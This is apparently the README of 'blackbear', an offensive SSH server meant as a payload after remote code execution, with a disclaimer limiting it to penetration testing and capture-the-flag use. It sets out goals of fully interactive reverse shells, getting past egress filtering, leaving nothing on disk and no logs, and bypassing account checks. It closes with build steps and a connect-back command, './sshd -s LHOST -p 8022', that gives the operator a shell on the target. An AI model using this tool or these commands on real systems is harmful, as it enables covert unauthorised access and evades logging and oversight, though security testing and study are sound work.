Disclamer:
Do not use in production or on any public facing server. Use only in penetration testing context, while participating in capture the flag competitions or otherwise studying computer security.
Blackbear project goals:
The blackbear server is to be used as main payload for RCE exploits.
Main goal is to have reliable interactive shell access (must be able to run top, sudo, screen, vi, etc) as opposed to crafted reverse shells meterpreter which allow basic commands but fail at interactive ones.
Secondary goal is to implement reverse ssh shell operation. This means than the server must be able to establish a tcp connection in addition to its ability to listen for incoming connections and vice versa. Once the server can connect to the client, the ssh protocols happens as usual so the client which received the connection gets a shell on the server.
As always, reverse shell operation is meant to bypass firewall with spotty (if any) egress filtering.
Additionnal goals:
+ be able to run under any user account, must not require root or elevated privileges.
+ server must not touch the disk, host keys shall be generated on the fly (insecure), authorized keys and configuration must be encoded within the binary, no logging. Only /dev/urandom and other required device files shall be used.
+ must bypass any and all authentication mecanisms except public key authentication. Than is to be able to gain access even if ~/.ssh/authorized_keys does not exists, the account is disabled, the account has an invalid shell, etc.
Dependencies:
+ zlib and openssl
Use and Download:
git clone https://github.com/Marc-andreLabonte/blackbear && cd blackbear autoreconf -fi ./configure make Example: ./ssh -i id_blackbearkey -r 0.0.0.0 -p 8022 Upload sshd binary on the target and run connect back to you on port 8022 ./sshd -s LHOST -p 8022 You shall receive a shell with the priviledges of the account running sshd
Click to Open Code Editor